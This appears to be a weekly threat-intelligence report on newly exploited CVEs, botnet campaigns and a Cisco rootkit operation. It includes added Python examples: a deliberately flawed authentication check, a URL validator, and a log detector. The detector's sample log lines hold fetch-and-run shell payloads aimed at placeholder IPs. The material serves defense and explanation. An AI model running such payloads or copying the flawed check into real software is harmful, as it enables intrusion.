Executive Summary
The week saw heightened threat activity across multiple fronts, with new vulnerabilities and active exploitation campaigns emerging globally.
CISA added six new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including two from Kentico Xperience CMS, and one each from Microsoft Windows, Oracle E-Business Suite, Apple, and MOTEX LANSCOPE, signaling diverse exploitation across enterprise and consumer ecosystems.
Active exploitation was also observed in WatchGuard Fireware OS and Adobe Commerce/Magento Open Source, where attackers leveraged remote code execution and session takeover vulnerabilities despite available patches.
Meanwhile, botnet operations surged worldwide, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP applications. IoT-targeting botnets such as Mirai, Bashlite, Tsunami, and BrickerBot intensified attacks on EirD1000 routers, aiming for persistence and lateral network movement.
Trend Micro has observed a cyberespionage campaign, dubbed Operation Zero Disco, targeting network infrastructure and using Cisco SNMP and modified Telnet flaws to deploy Linux rootkits and enable memory manipulation.
Key points
- 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
- 2 additional vulnerabilities were confirmed as actively exploited in the wild during the week.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-2746
An Authentication Bypass Using an Alternate Path or Channel vulnerability in Kentico Xperience CMS, affecting versions up to and including 13.0.172, can allow an attacker to control administrative objects; Kentico remediated the issue with hotfix 13.0.173, released on January 30, 2025. According to WatchTowr Labs, the flaw exists in the Staging/Sync Server’s digest authentication path: when an invalid or missing username is supplied, the service improperly returns an empty password string, effectively treating an empty SHA-1 hash as valid. A remote attacker who can reach the staging endpoint can therefore bypass the password check, gain authenticated access, and potentially perform administrative actions leading to follow-on remote code execution. The vulnerability has been added to the CISA KEV catalog.
CVE-2025-2747
An Authentication Bypass Using an Alternate Path or Channel vulnerability in Kentico Xperience allows a remote attacker to gain unauthorized administrative control over system objects. The issue affects versions prior to 13.0.178, and Kentico addressed it by releasing hotfix 13.0.178 on March 6, 2025. According to WatchTowr Labs, the flaw resides in the Staging/Sync Server component and stems from WSE 3.0’s improper handling of the UsernameToken “SendNone” option, which allows an attacker to send a SOAP request containing a valid username but no password and still be authenticated successfully. This bypass grants the attacker administrative access, potentially leading to remote code execution and full system compromise. The vulnerability has now been added to the CISA KEV catalog.
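Both Kentico flaws above share one pattern: a missing secret is accepted as a valid one. The added example below (illustrative Python, not Kentico's code) reproduces both behaviours in a simplified digest verifier beside a fail-closed version; the credential store, the SHA-1 digest scheme and the `None`-means-SendNone convention are assumptions for the illustration.

```python
import hashlib
import hmac
from typing import Optional

# Constructed credential store (plaintext only for this illustration;
# a real store would hold salted hashes).
USERS = {"admin": "correct horse battery staple"}


def digest_of(password: str) -> str:
    """SHA-1 hex digest, mirroring the digest scheme described in the advisory."""
    return hashlib.sha1(password.encode()).hexdigest()


def vulnerable_verify(username: Optional[str], client_digest: Optional[str]) -> bool:
    """Reproduces the two flawed behaviours described above.

    - Unknown or missing username resolves to "" instead of failing, so the
      expected value becomes SHA-1("") and a client sending that digest
      authenticates (CVE-2025-2746 pattern).
    - A request carrying a username but no password token at all is accepted
      (CVE-2025-2747 / SendNone pattern).
    """
    if client_digest is None:                         # SendNone: no password token
        return username in USERS
    stored_password = USERS.get(username or "", "")   # unknown user -> ""
    return digest_of(stored_password) == client_digest


def hardened_verify(username: Optional[str], client_digest: Optional[str]) -> bool:
    """Fail closed: require a known user, a present digest and a non-empty secret."""
    if not username or not client_digest:
        return False
    stored_password = USERS.get(username)
    if not stored_password:
        return False
    expected = digest_of(stored_password)
    # Constant-time comparison avoids leaking digest prefixes via timing.
    return hmac.compare_digest(expected, client_digest)
```

The two checks that close both bypasses are the rejection of an absent digest and the refusal to derive an expected digest from an empty secret.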
CVE-2025-9242
An Out-of-bounds Write vulnerability in WatchGuard Fireware OS, affecting 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.3, and 2025.1, allows a remote, unauthenticated attacker to execute arbitrary code; apart from the EOL 11.x releases, WatchGuard has published updated Fireware OS builds to remediate the issue. Technical analysis by WatchTowr Labs shows the flaw resides in the ike2_ProcessPayload_CERT routine (src/ike/iked/v2/ike2_payload_cert.c), where an unchecked copy of the client “identification” into a 520-byte stack buffer can be triggered during the IKE_SA_AUTH phase, before certificate validation. This enables a pre-auth stack overflow and remote code execution that can be weaponized to gain control of the instruction pointer, spawn an interactive Python shell via mprotect(), and escalate to a full Linux shell. Shadowserver estimates ~73,000 exposed WatchGuard instances worldwide (≈24,000 in the U.S.), and WatchGuard updated its advisory on 21 October to confirm evidence of active exploitation.
CVE-2025-33073
An Improper Access Control vulnerability in the Microsoft Windows SMB Client could allow privilege escalation to SYSTEM level. According to Microsoft, the flaw lies in the SMB protocol's access control mechanism, which can be exploited by a network-based, authenticated attacker to gain elevated privileges. In a high-risk scenario, an adversary could operate a malicious SMB server that tricks a user or application into connecting and authenticating, after which specially crafted payloads exchanged during the session could subvert the protocol, enabling unauthorized data access, system modifications, or complete system takeover. Public proof-of-concept for this vulnerability further increases the likelihood of exploitation. Although patched by Microsoft in June 2025, the flaw has now been added to the CISA KEV catalog.
CVE-2025-54236
An Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source enables session takeover and remote code execution via a nested deserialization flaw in the Commerce REST API. Although Adobe issued a hotfix in September 2025, Sansec has recently observed active exploitation, recording more than 250 attack attempts in 24 hours, with adversaries uploading PHP webshells via /customer/address_file/upload and probing phpinfo for configuration data. Current telemetry shows ~62% of Magento stores remain unpatched, leaving a large attack surface exposed. Immediate application of Adobe’s security update or recommended mitigations is strongly advised to prevent account takeover, webshell deployment, and full store compromise.
CVE-2025-61884
A pre-authentication Server-Side Request Forgery (SSRF) vulnerability in Oracle E-Business Suite Configurator, affecting versions 12.2.3 through 12.2.14, allows an unauthenticated HTTP attacker to retrieve or manipulate sensitive configuration data. Oracle released an emergency patch introducing strict validation of the return_url parameter using a regular expression to block injected CRLF sequences and mitigate the exploit. Following the leak of public proof-of-concept by the ShinyHunters extortion group, the risk of active exploitation has significantly increased. The vulnerability has now been added to the CISA KEV catalog, and organizations are strongly urged to apply Oracle’s update immediately and review any externally exposed E-Business Suite instances for potential compromise.
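The fix described above hinges on validating return_url after decoding, since CRLF sequences usually arrive percent-encoded. The added example below (illustrative Python, not Oracle's patch) contrasts a check applied to the raw parameter with one that decodes first and also restricts scheme and host; the allow-listed host and the regular expression are assumptions for the illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed allow-list of hosts the application may redirect or call back to.
ALLOWED_HOSTS = {"ebs.example.internal"}

# Raw or percent-encoded CR/LF: the sequences that enable header or request
# injection through a URL parameter. Illustrative pattern, not Oracle's.
CRLF_RE = re.compile(r"(%0d|%0a|\r|\n)", re.IGNORECASE)


def naive_check(return_url: str) -> bool:
    """Checks the raw parameter; a double-encoded '%250d%250a' slips through."""
    return not CRLF_RE.search(return_url)


def validate_return_url(return_url: str) -> bool:
    """Decode until stable (bounded), then reject CRLF, odd schemes, unknown hosts."""
    decoded = return_url
    for _ in range(3):                  # bounded: stops multi-encoding games
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if CRLF_RE.search(decoded):
        return False
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https"):
        return False
    return parts.hostname in ALLOWED_HOSTS
```

Host allow-listing is what addresses the SSRF itself; the CRLF filter alone only removes the injection vector.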
CVE-2025-61932
A Remote Code Execution (RCE) vulnerability in LANSCOPE Endpoint Manager (On-Premises) affects the Client Program (MR) and Detection Agent (DA) components in versions 9.4.7.1 and earlier. MOTEX has released updated builds to remediate the issue. According to MOTEX, the flaw arises from improper verification of communication channel sources and is actively exploited in the wild, with at least one confirmed case of a targeted customer. JPCERT/CC further explains that a specially crafted packet can trigger arbitrary code execution in the affected products without any user interaction. This vulnerability presents a serious threat to enterprise environments where Lanscope agents operate across distributed endpoints, as successful exploitation could allow an attacker to execute malicious code with system-level privileges, potentially resulting in network compromise, data theft, or ransomware deployment. The vulnerability has now been added to the CISA KEV catalog.
CVE-2022-48503
An Unspecified vulnerability in Apple multiple products, including macOS, iOS, iPadOS, tvOS, watchOS, and Safari, could allow arbitrary code execution when processing malicious web content. According to Apple, the issue stems from improper validation of an array index within the JavaScriptCore engine, which can trigger out-of-bounds behavior leading to code execution. Apple resolved the vulnerability by implementing improved bounds checks in WebKit, releasing patches across tvOS 15.6, watchOS 8.7, iOS 15.6, iPadOS 15.6, macOS Monterey 12.5, and Safari 15.6. Although already patched in 2022, this vulnerability has now been added to the CISA KEV catalog.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
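One way to surface the wget-to-IP payloads mentioned above in web-server logs, as an added example that is not part of the original report: the log lines are constructed (TEST-NET addresses) and the request-line format and regular expressions are assumptions for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (TEST-NET addresses).
SAMPLE_LOGS = [
    '203.0.113.7 - - [20/Oct/2025:10:01:02 +0000] "GET /cgi-bin/status?cmd=wget%20http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 404 0',
    '203.0.113.8 - - [20/Oct/2025:10:01:05 +0000] "POST /api/v4/projects HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Oct/2025:10:02:11 +0000] "GET /index.php?p=curl%20-s%20192.0.2.44%2Fbin%20%7C%20sh HTTP/1.1" 500 0',
]

# A download utility followed, within the same shell command, by a bare IPv4
# literal: the signature the MISP payload analysis above describes.
FETCH_TO_IP = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b[^;&|]*?(?:https?://|ftp://)?(\d{1,3}(?:\.\d{1,3}){3})",
    re.IGNORECASE,
)
LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)')


def find_botnet_fetches(lines):
    """Return (source_ip, tool, stager_ip) for every line whose decoded request
    target carries a fetch-from-IP payload."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        decoded = unquote(unquote(m["target"]))   # payloads are often double-encoded
        f = FETCH_TO_IP.search(decoded)
        if f:
            hits.append((m["src"], f.group(1).lower(), f.group(2)))
    return hits
```

Decoding before matching matters: the encoded request line contains neither a space nor a dot-separated address in matchable form.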
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
CVE-2025-20352 and CVE-2017-3881
According to Trend Micro, attackers have been exploiting the Cisco SNMP vulnerability CVE-2025-20352 to deploy Linux-based rootkits as part of a campaign named Operation Zero Disco, targeting older and unprotected Cisco 9400, 9300, and legacy 3750G series devices and enabling remote code execution and persistent unauthorized access. The implanted malware establishes a universal password containing the term "disco", a one-letter variation of "Cisco", and installs multiple hooks into the IOSd memory space, resulting in fileless persistence that vanishes after reboot. The campaign also attempted to exploit a modified Telnet vulnerability derived from CVE-2017-3881, altered to enable memory read and write capabilities rather than standard RCE. While newer switch models benefit from Address Space Layout Randomization (ASLR), which limits exploitation success, repeated intrusion attempts can still overcome these mitigations, posing a significant risk to legacy and misconfigured network infrastructure.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
The week’s developments highlight a concerning trend of rapid vulnerability weaponization and coordinated exploitation across diverse platforms. From enterprise software flaws to IoT and network infrastructure attacks, adversaries are demonstrating increasing agility in leveraging unpatched systems. Active exploitation and espionage campaigns underscore the urgent need for timely patching and continuous threat visibility. Loginsoft Vulnerability Intelligence (LOVI) equips organizations with actionable context to stay ahead of evolving exploitation campaigns and strengthen their defensive posture.